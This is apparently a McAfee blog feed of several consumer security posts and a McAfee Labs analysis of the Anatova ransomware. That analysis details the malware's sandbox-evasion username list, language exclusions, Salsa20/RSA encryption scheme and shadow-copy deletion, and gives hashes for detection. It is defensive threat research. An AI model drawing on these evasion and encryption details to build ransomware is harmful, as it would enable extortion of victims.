  1. Talk To Your School

The first thing to do is speak to your child’s school to understand exactly how secure their network is. I’d recommend asking who has access to the network, what security practices they have in place and how they manage your child’s private data.

  1. Install Security Software

Operating a device without security software is no different to leaving your front door unlocked. Installing security software on all devices, including smartphones, will provide protection against viruses, online threats, risky websites and dangerous downloads. Check out McAfee’s Total Protection security software for total peace of mind!

  1. Keep Device Software Up To Date

Software updates are commonly designed to address security issues. So ensuring ALL your devices are up to date is a relatively easy way of minimising the risk of being hacked.

  1. Schedule Regular Data Back Up

If you are the victim of a ransomware attack and your data is backed up then you won’t even have to consider paying the hefty fee to retrieve your (or your child’s) data. Backing up data regularly should be not negotiable however life can often get in the way. Why not schedule automatic backups? I personally love online backup options such as Dropbox and Google Drive however you may choose to invest in a hard drive.

  1. Public Wi-Fi Rules?

If after talking to your school, you aren’t convinced that your child’s school WiFi network is secure, then I recommend that your kids should treat it as if it was public WiFi. This means that they should NEVER conduct any financial transactions using it and never share any personal details. But the absolute best way of ensuring your child is safe using an unsecured WiFi network, is to use a Virtual Private Network (VPN). A VPN like McAfee’s Safe Connect creates an encrypted tunnel so anything that is shared over WiFi is completely safe.

As a mum of 4, I am very keen to ensure my kids are engaged with their learning. And in our digital times, this means devices and WiFi. So, let’s support our kids and their teachers in their quest for interactive, digital learning but please don’t forget to check in and ensure your kids are as safe as possible while using WiFi at school.

Take Care

Alex xx

The post How Safe is Your Child’s School WiFi? appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/family-safety/how-safe-is-your-childs-school-wifi/feed/ 0
Happy New Year 2019! Anatova is here! https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/happy-new-year-2019-anatova-is-here/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/happy-new-year-2019-anatova-is-here/#respond Tue, 22 Jan 2019 20:43:53 +0000 https://securingtomorrow.mcafee.com/?p=93918

During our continuous hunt for new threats, we discovered a new ransomware family we call Anatova (based on the name of the ransom note). Anatova was discovered in a private peer-to-peer (p2p) network. After initial analysis, and making sure that our customers are protected, we decided to make this discovery public. Our telemetry showed that […]

The post Happy New Year 2019! Anatova is here! appeared first on McAfee Blogs.

]]>

During our continuous hunt for new threats, we discovered a new ransomware family we call Anatova (based on the name of the ransom note). Anatova was discovered in a private peer-to-peer (p2p) network. After initial analysis, and making sure that our customers are protected, we decided to make this discovery public.

Our telemetry showed that although Anatova is relatively new, we already discovered a widespread detection of the thread around the globe

We believe that Anatova can become a serious threat since the code is prepared for modular extension.

Additionally, it will also check if network-shares are connected and will encrypt the files on these shares too. The developers/actors behind Anatova are, according our assessment, skilled malware authors. We draw this conclusion as each sample has its own unique key, as well as other functions we will describe, which we do not often see in ransomware families.

This post will explain the technical details of Anatova, as well as some interesting facts about this new ransomware family.

For the analysis we used this particular hash: 170fb7438316f7335f34fa1a431afc1676a786f1ad9dee63d78c3f5efd3a0ac0

The main goal of Anatova is to cipher all the files that it can before requesting payment from the victim.

 

Anatova Overview

Anatova usually uses the icon of a game or application to try and fool the user into downloading it. It has a manifest to request admin rights.

Information about the binary

The Anatova ransomware is a 64bits application with the compile date of January 1st, 2019. The file size of this particular hash is 307kb, but it can change due to the amount of resources used in the sample. If we remove all these resources, the size is 32kb; a very small program with a powerful mechanism inside.

Anatova has some strong protection techniques against static analysis which makes things slightly tricky:

  • Most of the strings are encrypted (Unicode and Ascii), using different keys to decrypt them, embedded in the executable.
  • 90% of the calls are dynamic;, they only use the following non-suspicious Windows API’s and standard library of C- programming language: GetModuleHandleW, LoadLibraryW, GetProcAddress, ExitProcess and MessageBoxA.
  • When we open the binary in IDA Pro (included the latest version of IDA) the functions are bad detected, and they finish being processed after 3 opcodes. We are not sure if this is a bug in IDA Pro or perhaps the malware authors created something to cause this on purpose (which we doubt).

Problem in IDA Pro 7.2 last version

 

Entry Vector

At the moment we don´t know all entry vectors that Anatova is using, or will be using, in the near future. Our initial finding location was in private p2p.

The goal of Anatova, as with other ransomware families, is to encrypt all or many files on an infected system and insist on payment to unlock them. The actor(s) demand a ransom payment in cryptocurrency of 10 DASH – currently valued at around $700 USD, a quite high amount compared to other ransomware families.

 

In-depth highlights of version 1.0

Since this is a novel family, we didn’t find any version number inside the code, but let’s call this version 1.0

The first action that the malware executes is to get the module handle of the library “kernel32.dll” and get 29 functions from it using the function “GetProcAddress”.

Get kernel32 functions after decrypt strings

If the malware can´t get the module handle of kernel32, or some of the functions can´t be found, it will quit without executing any encryption.

Later, the malware will try to create a mutex with a hardcoded name (in this case: 6a8c9937zFIwHPZ309UZMZYVnwScPB2pR2MEx5SY7B1xgbruoO) but the mutex name changes in each sample. If the mutex is created, and gets the handle, it will call the “GetLastError” function and look if the last error is ERROR_ALREADY_EXISTS or ERROR_ACCESS_DENIED. Both errors mean that a previous instance of this mutex object exists. If that is the case, the malware will enter in a flow of cleaning memory, that we will explain later in this post, and finish.

Check mutex

After this check, Anatova will get some functions from the library “advapi32.dll”, “Crypt32.dll” and “Shell32.dll” using the same procedure as in the kernel case. All text is encrypted and decrypted one per one, get the function, free the memory, and continue with the next one.

If it fails in getting some of these modules or some of the functions it needs, it will go to the flow of cleaning tool and exit.

One interesting function we discovered was that Anatova will retrieve the username of the logged in and/or active user and compare with a list of names encrypted. If one of the names is detected, it will go to the cleaning flow procedure and exit.

The list of users searched are:

  • LaVirulera
  • tester
  • Tester
  • analyst
  • Analyst
  • lab
  • Lab
  • Malware
  • malware

Some analysts or virtual machines/sandboxes are using these default usernames in their setup, meaning that the ransomware will not work on these machines/sandboxes.

After this user-check, Anatova will check the language of the system. When we say language, we mean the system language. When a user installs the Windows OS, they choose a language to install it with (though later the user could install a different language). Anatova checks for the first installed language on the system to ensure that a user cannot install one of these blacklisted languages to avoid encryption of the files.

The list of the countries that Anatova doesn’t affect are:

  • All CIS countries
  • Syria
  • Egypt
  • Morocco
  • Iraq
  • India

It’s quite normal to see the CIS countries being excluded from execution and often an indicator that the authors might be originating from one of these countries. In this case it was surprising to see the other countries being mentioned. We do not have a clear hypothesis on why these countries in particular are excluded.

Check system language

After the language check, Anatova looks for a flag that, in all samples we looked at, has the value of 0, but if this flag would change to the value of 1 (the current malware samples never change that value), it will load two DLLs with the names (after decryption) of “extra1.dll” and “extra2.dll”. This might indicate that Anatova is prepared to be modular or to be extended with more functions in the near future.

Load extra modules

After this, the malware enumerates all processes in the system and compares them with a large list including, for example “steam.exe”, “sqlserver.exe”, etc. If some of these processes are discovered, the malware will open them and terminate them. This action is typical of ransomware that attempts to unlock files that later will be encrypted, such as database files, game files, Office related files, etc.

The next action is to create an RSA Pair of Keys using the crypto API that will cipher all strings. This function is the same as in other ransomware families, such as GandCrab or Crysis, for example. It makes sure that the keys that will be used, are per user and per execution.

If the malware can´t create the keys, it will go to the clean flow and exit.

After this, Anatova will make a random key of 32 bits and another value of 8 bytes using the function of the crypto API “CryptGenRandom” to encrypt using the Salsa20 algorithm and the private previous blob key in runtime.

During the encryption process of the files, it will decrypt the master RSA public key of the sample of 2 layers of crypto, the first one is a XOR with the value 0x55 and the second one is to decrypt it using a hardcoded key and IV in the sample using the Salsa20 algorithm.

Decrypt from first layer the master RSA public key of sample

After this, it will import the public key and with it, will encrypt the Salsa20 key and IV used to encrypt the private RSA key in runtime.

The next step is to prepare a buffer of memory and with all of the info encrypted (Salsa20 key, Salsa20 IV, and private RSA key). It makes a big string in BASE64 using the function “CryptBinaryToStringA”. The ransomware will later clean the computer’s memory of the key, IV, and private RSA key values, to prevent anyone dumping this information from memory and creating a decrypter.

This BASE64 string will be written later in the ransom note. Only the malware authors can decrypt the Salsa20 key and IV and the private RSA key that the user would need  to decrypt the files.

If this does not work, Anatova will delete itself, enter in the clean flow and exit.

When the keys are encrypted in the memory buffer, Anatova will enumerate all logic units and will search for all existing instances of the type DRIVE_FIXED (a normal hard disk for example) or DRIVE_REMOTE (for remote network shares that are mounted). Anatova will try to encrypt the files on each of those locations. This means that one corporate victim can cause a major incident when files on network-shares are being encrypted.

Check all logic units

For each mounted drive – hard disk or remote share, Anatova will get all files and folders. It will later check if it is a folder and, if it is, will check that the folder name doesn’t have the name of “.” and “..”, to avoid the same directory and the previous directory.

In the list of gathered folder names, Anatova checks against a list of blacklisted names such as “Windows”, “Program Files”, “Program Files(x86)”, etc. This is usual in many ransomware families, because the authors want to avoid destroying the Operating System, instead targeting the high value files. Anatova does the same for file-extensions .exe, .dll and .sys that are critical for the Operating system as well.

Check file name and extension

If this check is passed, Anatova will open the file and get its size, comparing it to1 MB. Anatova will only encrypt files1 MB or smaller to avoid lost time with big files; it wants to encrypt fast. By setting pointers at the end of the encrypted files, Anatova makes sure that it does not encrypt files that are already encrypted.

Next, Anatova will create a random value of 32bits as a key for the Salsa20 algorithm and another value of 8 bytes that will be used as IV for Salsa20.

With these values, it will read all files in memory or files with a maximum size of 1 MB and encrypt this information with the key and IV using the Salsa20 algorithm (this is very popular lately because it is a very quick algorithm and has open source implementations).

Encryption of files function

It will import the RSA public key created in runtime and with it, encrypt the key and IV used to encrypt the file. Next, it will write the encrypted content in the same file from the beginning of the file and then it will set the pointer to the end of the file and write the next things:

  • The block encrypted of the Salsa20 key is ciphered with the public RSA key.
  • The block encrypted of the Salsa20 IV is ciphered with the public RSA key.
  • The size of the file is smaller than 1 MB.
  • A special hardcoded value for each sample that will appear in the ransom note.
  • A special hardcoded value in the sample that is the mark of infection checked before to avoid encrypting the same file twice.

When this is completed, Anatova will write a ransom note in the same folder. So, if Anatova can´t encrypt at least something in a folder, it won’t create a ransom note in this folder, only in the affected folders.

This behavior is different from other ransomware families that write a ransom note in all folders.

The ransom note text is fully encrypted in the binary, except for the mail addresses to contact the author(s) and the dash address to pay.

Anatova doesn’t overwrite the ransom note if it already exists in a folder in order to save time.The ransom note contains the base64 block with all encrypted information that is needed to decrypt the files in a block that start with the string “—-KEY—-”, as well asthe id number.

Responding victims are then allowed to decrypt one .jpg file of maximum size 200kb free of charge, as proof that they the decrypted files can be retrieved.

Example of ransom note

When all this is done, Anatova will destroy the Volume Shadow copies 10 times in very quick succession. Like most ransomware families, it is using the vssadmin program, which required admin rights, to run and delete the volume shadow copies.

Delete of Shadow Volumes 10 times

Finally, when all steps are completed, the ransomware will follow the flow of cleaning code, as described earlier, mainly to prevent dumping memory code that could assist in creating a decryption tool.

COVERAGE

Customers of McAfee gateway and endpoint products are protected against this version. Detection names include Ransom-Anatova![partialhash].

INDICATORS OF COMPROMISE

The samples use the following MITRE ATT&CK™ techniques:

  • Execution through API
  • Application processes discovery
  • File and directory discovery: to search files to encrypt
  • Encrypt files
  • Process discovery: enumerating all processes on the endpoint to kill some special ones
  • Create files
  • Elevation of privileges: request it to run.
  • Create mutants

 

Hashes:

2a0da563f5b88c4d630aefbcd212a35e

366770ebfd096b69e5017a3e33577a94

9d844d5480eec1715b18e3f6472618aa

61139db0bbe4937cd1afc0b818049891

596ebe227dcd03863e0a740b6c605924

 

The post Happy New Year 2019! Anatova is here! appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/happy-new-year-2019-anatova-is-here/feed/ 0
5G Is Coming: Security Risks You Need to Know About https://securingtomorrow.mcafee.com/consumer/mobile-and-iot-security/5g-security-risks-you-need-to-know/ https://securingtomorrow.mcafee.com/consumer/mobile-and-iot-security/5g-security-risks-you-need-to-know/#respond Tue, 22 Jan 2019 19:08:43 +0000 https://securingtomorrow.mcafee.com/?p=93911

The future of connectivity is here ­– 5G. This new network is set to roll out across the nation this coming year and bring greater speed to our handheld devices, which means more data and lower latency. But perhaps one of the most anticipated and popular benefits is it will allow even more IoT devices […]

The post 5G Is Coming: Security Risks You Need to Know About appeared first on McAfee Blogs.

]]>

The future of connectivity is here ­– 5G. This new network is set to roll out across the nation this coming year and bring greater speed to our handheld devices, which means more data and lower latency. But perhaps one of the most anticipated and popular benefits is it will allow even more IoT devices to come online and encourage more connection between said devices. This would enable users to remotely connect to or monitor their IoT devices like kitchen or security gadgets. The promise of more connectivity, smoother IoT user experience, and even more devices online, means there are likely more opportunities and avenues for cyberattacks. 5G will no doubt shape the foreseeable future, let’s see how.

Today, interconnected devices operate on low-powered, low-data-rate networks, such as Cat-M and NB-IoT. With the introduction of 5G networks across the world, the capabilities of VR and AR, AI and ML, and automation and robotics will enhance immensely. Take self-driving cars, for example. These machines require close proximity to their computing to reduce the latency of decision making. The capabilities of 5G don’t end there either. From manufacturing, transportation and logistics, to public safety and the establishment of smart cities, industries are at the ready to take their business to the next level with 5G. With this newfound growing anticipation for the future of 5G, the question has to be asked, what are the security implications for smaller IoT devices?

From an innovation standpoint, 5G is a beacon of light, but from a cybersecurity standpoint, 5G is a “hotbed for a new era of intensified cyberwar.” Denial-of-service attacks, or DDoS, are particular causes of concern for cybersecurity researchers. Devices like refrigerators, thermometers, even light bulbs, will be able to come online because of 5G. Users will be able to remotely check on these appliances through a simple app, but these devices can also be usurped by malicious characters. This increased connectivity and power could see big name sites down for days, or even affect city utility capabilities. Government agencies and private entities are not immune either, but they do have plans in place in the event a DDoS attack occurs.

While consumers can only wait and see what happens with the rollout, industries across the board will want to harness the benefits of 5G. However, consumers and organizations alike need to be cautious in terms of how 5G could be used to help, or hinder, us in the future. Rest assured, even if malicious actors utilize this technology, McAfee’s security strategy will continue to keep pace with the ever-changing threat landscape.

Interested in learning more about IoT and mobile security trends and information? Follow @McAfee_Home on Twitter, and ‘Like” us on Facebook.

The post 5G Is Coming: Security Risks You Need to Know About appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/mobile-and-iot-security/5g-security-risks-you-need-to-know/feed/ 0
Are Smart TVs too smart for their own good? https://securingtomorrow.mcafee.com/consumer/are-smart-tvs-too-smart-for-their-own-good/ https://securingtomorrow.mcafee.com/consumer/are-smart-tvs-too-smart-for-their-own-good/#respond Tue, 22 Jan 2019 17:00:35 +0000 https://securingtomorrow.mcafee.com/?p=93865

Smart TVs give viewers instant access to streaming apps and provide a never-ending supply of binge-worthy shows and movies. But does this convenience come with a cost? Are internet-connected TVs as vulnerable to cybercrime as other smart devices? In the latest episode of “Hackable?” our host Geoff Siskind plays a prank on our producer Pedro […]

The post Are Smart TVs too smart for their own good? appeared first on McAfee Blogs.

]]>

Smart TVs give viewers instant access to streaming apps and provide a never-ending supply of binge-worthy shows and movies. But does this convenience come with a cost? Are internet-connected TVs as vulnerable to cybercrime as other smart devices?

In the latest episode of “Hackable?” our host Geoff Siskind plays a prank on our producer Pedro — in the name of education, of course. Pedro is a huge soccer fan, so Geoff drives by with two white-hat hackers to see if they can hack his smart TV during a big game. Can they take remote control in only a half an hour?   

Listen now to the award-winning podcast Hackable? on Apple Podcasts. You don’t want to miss this hilarious episode filled with pranks.   


The post Are Smart TVs too smart for their own good? appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/are-smart-tvs-too-smart-for-their-own-good/feed/ 0
Are Smart TVs too smart for their own good? https://securingtomorrow.mcafee.com/other-blogs/trusted-advisor/are-smart-tvs-too-smart-for-their-own-good-2/ https://securingtomorrow.mcafee.com/other-blogs/trusted-advisor/are-smart-tvs-too-smart-for-their-own-good-2/#respond Tue, 22 Jan 2019 17:00:08 +0000 https://securingtomorrow.mcafee.com/?p=93868 Smart TVs give viewers instant access to streaming apps and provide a never-ending supply of binge-worthy shows and movies. But does this convenience come with a cost? Are internet-connected TVs as vulnerable to cybercrime as other smart devices? In the latest episode of “Hackable?” our host Geoff Siskind plays a prank on our producer Pedro […]

The post Are Smart TVs too smart for their own good? appeared first on McAfee Blogs.

]]>
Smart TVs give viewers instant access to streaming apps and provide a never-ending supply of binge-worthy shows and movies. But does this convenience come with a cost? Are internet-connected TVs as vulnerable to cybercrime as other smart devices?

In the latest episode of “Hackable?” our host Geoff Siskind plays a prank on our producer Pedro — in the name of education, of course. Pedro is a huge soccer fan, so Geoff drives by with two white-hat hackers to see if they can hack his smart TV during a big game. Can they take remote control in only a half an hour?   

Listen now to the award-winning podcast Hackable? on Apple Podcasts. You don’t want to miss this hilarious episode filled with pranks.   


The post Are Smart TVs too smart for their own good? appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/trusted-advisor/are-smart-tvs-too-smart-for-their-own-good-2/feed/ 0
AI & Your Family: The Wows and Potential Risks https://securingtomorrow.mcafee.com/consumer/family-safety/artificial-intelligence-your-family-the-wows-and-the-risks/ https://securingtomorrow.mcafee.com/consumer/family-safety/artificial-intelligence-your-family-the-wows-and-the-risks/#respond Sat, 19 Jan 2019 19:34:19 +0000 https://securingtomorrow.mcafee.com/?p=93892

Am I the only one? When I hear or see the word Artificial Intelligence (AI), my mind instantly defaults to images from sci-fi movies I’ve seen like I, Robot, Matrix, and Ex Machina. There’s always been a futuristic element — and self-imposed distance — between AI and myself. But AI is anything but futuristic or […]

The post AI & Your Family: The Wows and Potential Risks appeared first on McAfee Blogs.

]]>

artificial intelligenceAm I the only one? When I hear or see the word Artificial Intelligence (AI), my mind instantly defaults to images from sci-fi movies I’ve seen like I, Robot, Matrix, and Ex Machina. There’s always been a futuristic element — and self-imposed distance — between AI and myself.

But AI is anything but futuristic or distant. AI is here, and it’s now. And, we’re using it in ways we may not even realize.

AI has been woven throughout our lives for years in various expressions of technology. AI is in our homes, workplaces, and our hands every day via our smartphones.

Just a few everyday examples of AI:

  • Cell phones with built-in smart assistants
  • Toys that listen and respond to children
  • Social networks that determine what content you see
  • Social networking apps with fun filters
  • GPS apps that help you get where you need to go
  • Movie apps that predict what show you’d enjoy next
  • Music apps that curate playlists that echo your taste
  • Video games that deploy bots to play against you
  • Advertisers who follow you online with targeted ads
  • Refrigerators that alert you when food is about to expire
  • Home assistants that carry out voice commands
  • Flights you take that operate via an AI autopilot

The Technology

While AI sounds a little intimidating, it’s not when you break it down. AI is technology that can be programmed to accomplish a specific set of goals without assistance. In short, it’s a computer’s ability to be predictive — to process data, evaluate it, and take action.

AI is being implemented in education, business, manufacturing, retail, transportation, and just about any other sector of industry and culture you can imagine. It’s the smarter, faster, more profitable way to accomplish manual tasks.

An there’s tons of AI-generated good going on. Instagram — the #2 most popular social network — is now using AI technology to detect and combat cyberbullying on in both comments and photos.

No doubt, AI is having a significant impact on everyday life and is positioned to transform the future.

Still, there are concerns. The self-driving cars. The robots that malfunction. The potential jobs lost to AI robots.

So, as quickly as this popular new technology is being applied, now is a great time to talk with your family about both the exciting potential of AI and the risks that may come with it.

Talking points for families

Fake videos, images. AI is making it easier for people to face swap within images and videos. A desktop application called FakeApp allows users to seamlessly swap faces and share fake videos and images. This has led to the rise in “deep fake” videos that appear remarkably realistic (many of which go viral). Tip: Talk to your family about the power of AI technology and the responsibility and critical thinking they must exercise as they consume and share online content.

Privacy breaches. Following the Cambridge Analytica/Facebook scandal of 2018 that allegedly used AI technology unethically to collect Facebook user data, we’re reminded of those out to gather our private (and public) information for financial or political gain. Tip: Discuss locking down privacy settings on social networks and encourage your kids to be hyper mindful about the information they share in the public feed. That information includes liking and commenting on other content — all of which AI technology can piece together into a broader digital picture for misuse.

Cybercrime. As outlined in McAfee’s 2019 Threats Prediction Report, AI technology will likely allow hackers more ease to bypass security measures on networks undetected. This can lead to data breaches, malware attacks, ransomware, and other criminal activity. Additionally, AI-generated phishing emails are scamming people into handing over sensitive data. Tip: Bogus emails can be highly personalized and trick intelligent users into clicking malicious links. Discuss the sophistication of the AI-related scams and warn your family to think about every click — even those from friends.

IoT security. With homes becoming “smarter” and equipped with AI-powered IoT products, the opportunity for hackers to get into these devices to steal sensitive data is growing. According to McAfee’s Threat Prediction Report, voice-activated assistants are especially vulnerable as a point-of-entry for hackers. Also at risk, say security experts, are routers, smartphones, and tablets. Tip: Be sure to keep all devices updated. Secure all of your connected devices and your home internet at its source — the network. Avoid routers that come with your ISP (Internet Security Provider) since they are often less secure. And, be sure to change the default password and secure your primary network and guest network with strong passwords.

The post AI & Your Family: The Wows and Potential Risks appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/family-safety/artificial-intelligence-your-family-the-wows-and-the-risks/feed/ 0
Step Up on Emerging Technology, or Risk Falling Behind https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/step-up-on-emerging-technology-or-risk-falling-behind/ https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/step-up-on-emerging-technology-or-risk-falling-behind/#respond Fri, 18 Jan 2019 22:00:30 +0000 https://securingtomorrow.mcafee.com/?p=93885

Earlier last year, the U.S. Commerce Department’s Bureau of Industry and Security (BIS) put out a call for public comment on criteria for identifying emerging technologies that could potentially be subject to future export control regulations. The tech industry responded in full force, providing recommendations for how the federal government can ensure U.S. competitiveness in […]

The post Step Up on Emerging Technology, or Risk Falling Behind appeared first on McAfee Blogs.

]]>

Earlier last year, the U.S. Commerce Department’s Bureau of Industry and Security (BIS) put out a call for public comment on criteria for identifying emerging technologies that could potentially be subject to future export control regulations. The tech industry responded in full force, providing recommendations for how the federal government can ensure U.S. competitiveness in the global market while supporting the development of emerging technology (read comments submitted by McAfee here).

Emerging technology poses an interesting challenge for tech companies and federal regulators alike. In many cases, technologies that BIS designates as “emerging,” such as AI and machine learning, are already in widespread use around the world. Other technologies like quantum computing are very much in the research and development phase but have the potential to alter the course of national security for decades to come. Many of these technologies are difficult to define and control, and many are software-based, which greatly complicates the development of regulation. Software technologies, by their very nature, are fundamentally different from physical items and physical process technologies. Their intangible, readily-reproducible character makes software-based technologies inherently difficult to define and control.

This task is enormous and must be handled cautiously, as history has provided countless examples of how overregulation has the capability to hamper development. A poignant example of overregulation at the cost of progress is the automobile industry. According to Deloitte, although tough restrictions on automobiles were nothing but well-intentioned in the late 1800’s, regulation greatly hampered research and advancement. The early days of the automobile industry should serve as a cautionary tale when it comes to regulating new and innovative technology.

The U.S. is in a unique position to act to protect our technological interest and secure the nation’s position as a global leader. The U.S. secured a pivotal tech leadership role, having spearheaded the development of the internet in the early 1990’s. The nation has immense power and potential to take the mantle on emerging technology, and the stakes are high. Some of the country’s greatest accomplishments have stemmed from empowering the private sector and encouraging innovation. For example, tremendous strides in private sector space exploration have been made possible due to the support and administration of empowering legislation. Companies like SpaceX and Boeing are creating next generation space technology, working each day to ensure that the U.S. maintains competitiveness.

Cybersecurity is another area that requires particular attention. Given the global availability of cybersecurity tools, many of which make use of the emerging technologies under review, McAfee understands that great care needs to be taken by our government before imposing additional export controls on American cyber companies. These rules can have the unintended and harmful consequence of stunting the growth and technical capabilities of the very companies that currently protect vital U.S. critical infrastructure, including federal and state government infrastructure, from cyber-attacks. As a leading nation, it is critical to stay ahead of threats by criminal actors. This is only possible if cyber companies have the ability to access global markets to fund the research and development needed to keep pace with rapid innovation. Controls should be implemented with a great understanding of the need to stay competitive in global innovation, particularly when it comes to cybersecurity.

Overregulation could cause great harm, and the U.S. government must tread carefully in administering a carefully-crafted, targeted approach. Rather than burdening U.S. software companies with new and substantial export control compliance costs, the U.S. should seek to empower these companies. Any controls deemed essential by the government should be as narrowly tailored as possible, especially given the broad range of current and future companies and technologies. A multilateral approach to export controls on emerging technologies is vital for U.S. companies to remain innovative and competitive in the global marketplace. This cautious approach would ensure alignment between the private and public sectors, ultimately allowing for emerging technology to be front and center. Providing an ecosystem in which the technology of tomorrow can flourish is essential to the U.S. continuing to blaze the trail on emerging technologies.

The post Step Up on Emerging Technology, or Risk Falling Behind appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/step-up-on-emerging-technology-or-risk-falling-behind/feed/ 0
The Collection #1 Data Breach: Insights and Tips on This Cyberthreat https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/collection-1-data-breach/ https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/collection-1-data-breach/#respond Fri, 18 Jan 2019 21:06:22 +0000 https://securingtomorrow.mcafee.com/?p=93887

As the cybersecurity landscape evolves to match new trends in technology, it’s important for consumers to prioritize the protection of their online presence. That means remaining aware of the internet’s more common cyberthreats, including malware, phishing, and data breaches, and how they could potentially affect you. And while most of us already know about the […]

The post The Collection #1 Data Breach: Insights and Tips on This Cyberthreat appeared first on McAfee Blogs.

]]>

As the cybersecurity landscape evolves to match new trends in technology, it’s important for consumers to prioritize the protection of their online presence. That means remaining aware of the internet’s more common cyberthreats, including malware, phishing, and data breaches, and how they could potentially affect you. And while most of us already know about the Equifax data breach, a new monster breach now has to become top of mind for us all. Say hello to Collection #1, a data set exposing 772,904,991 unique email addresses and over 21 million unique passwords.

Discovered by security researcher Troy Hunt, Collection #1 first appeared on the popular cloud service called MEGA. The Collection #1 folder held over 12,000 files that weigh in at over 87 gigabytes. When the storage site was taken down, the folder was then transferred to a public hacking site. What’s truly astonishing about this is that the data was not for sale; it was simply available for anyone to take.

You may be wondering, how was all this data collected? It appears that this data was comprised of a breach of breaches, aggregating over 2,000 leaked databases containing cracked passwords, in order to achieve maximum exposure. The sheer volume of this breach makes Collection #1 the second largest in size to Yahoo, and the largest public breach ever (given the data was openly exposed on the internet).

It appears that this data set is designed for use in credential-stuffing attacks, where cybercriminals will use email and password combinations to hack into consumers’ online accounts. The risks could be even greater for those who reuse credentials across multiple accounts. In order to help protect yourself from this threat, it’s vital that users act fast and use the following tips to help protect their data:

  • Use strong, unique passwords. In addition to making sure all of your passwords are strong and unique, never reuse passwords across multiple accounts. You can also enable a password manager to help keep track of your credentials.
  • Change your passwords. Even if it doesn’t appear that your data was breached, it’s better to err on the side of caution and change all of your passwords to better protect yourself.
  • Enable two-factor authentication. While a strong and unique password is a good first line of defense, enabling app-based two-factor authentication across your accounts will help your cause by providing an added layer of security.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post The Collection #1 Data Breach: Insights and Tips on This Cyberthreat appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/collection-1-data-breach/feed/ 0
Frequent Fortnite Player? 4 Tips to Combat the New Attack on User Accounts https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/fortnite-flaw-phishing-accounts/ https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/fortnite-flaw-phishing-accounts/#respond Fri, 18 Jan 2019 01:00:35 +0000 https://securingtomorrow.mcafee.com/?p=93861

Epic Games’ Fortnite has risen in popularity rapidly since its debut, and cybercriminals have leveraged that popularity to enact a handful of malicious schemes. Unfortunately, these tricks are showing no signs of slowing, as researchers recently discovered a security flaw that allowed cybercriminals to take over a gamer’s Fortnite account through a malicious link. This attack specifically […]

The post Frequent Fortnite Player? 4 Tips to Combat the New Attack on User Accounts appeared first on McAfee Blogs.

]]>

Epic Games’ Fortnite has risen in popularity rapidly since its debut, and cybercriminals have leveraged that popularity to enact a handful of malicious schemes. Unfortunately, these tricks are showing no signs of slowing, as researchers recently discovered a security flaw that allowed cybercriminals to take over a gamer’s Fortnite account through a malicious link. This attack specifically targeted users who used a third-party website to log in to their Fortnite accounts, such as Facebook, Google, or gaming providers like Microsoft, Nintendo, and Sony. But instead of trying to steal a gamer’s password like many of the hacks we’ve seen, this scheme targeted the special access token the third-party website exchanges with the game when a user logs in.

So, how exactly does this threat work? First, a cybercriminal sends a malicious phishing link to a Fortnite user. To increase the likelihood that a user will click on the link, the cybercriminal would send the link with an enticing message promising perks like free game credits. If the user clicked on the link, they would be redirected to the vulnerable login page. From here, Epic Games would make the request for the SSO (single sign-on) token from the third-party site, given SSO allows a user to leverage one set of login credentials across multiple accounts. This authentication token is usually sent to Fortnite over the back-end, removing the need for the user to remember a password to access the game. However, due to the unsecured login page, the user would be redirected to the attacker’s URL. This allows cybercriminals to intercept the user’s login token and take over their Fortnite account.

After acquiring a login token, a cybercriminal would gain access to a Fortnite user’s personal and financial details. Because Fortnite accounts have partial payment card numbers tied to them, a cybercriminal would be able to make in-game purchases and rack up a slew of charges on the victim’s card.

It’s important for players to understand the realities of gaming security in order to be more prepared for potential cyberthreats such as the Fortnite hack. According to McAfee research, the average gamer has experienced almost five cyberattacks, with 75% of PC gamers worried about the security of gaming. And while Epic Games has thankfully fixed this security flaw, there are a number of techniques players can use to help safeguard their gaming security now and in the future:

  • Go straight to the source70% of breaches start with a phishing email. And phishing scams can be stopped by simply avoiding the email and going straight to the source to be sure you’re working with the real deal. In the case of this particular scheme, you should be able to check your account status on the Fortnite website and determine the legitimacy of the request from there.
  • Use a strong, unique password. If you think your Fortnite account was hacked, err on the side of caution by updating your login credentials. In addition, don’t reuse passwords over multiple accounts. Reusing passwords could allow a cybercriminal to access multiple of your accounts by just hacking into one of them.
  • Stay on top of your financial transactions. Check your bank statements regularly to monitor the activity of the card linked to your Fortnite account. If you see repeat or multiple transactions from your account, or see charges that you don’t recognize, alert your bank to ensure that your funds are protected.
  • Get protection specifically designed for gamers. We’re currently building McAfee Gamer Security to help boost your PC’s performance, while simultaneously safeguarding you from a variety of threats that can disrupt your gaming experience.

And, as always, stay on top of the latest consumer and mobile security threats by following @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Frequent Fortnite Player? 4 Tips to Combat the New Attack on User Accounts appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/fortnite-flaw-phishing-accounts/feed/ 0
McAfee Honors Dr. Martin Luther King Jr. Day https://securingtomorrow.mcafee.com/other-blogs/life-at-mcafee/mcafee-honors-dr-martin-luther-king-jr-day/ https://securingtomorrow.mcafee.com/other-blogs/life-at-mcafee/mcafee-honors-dr-martin-luther-king-jr-day/#respond Thu, 17 Jan 2019 18:01:26 +0000 https://securingtomorrow.mcafee.com/?p=93844

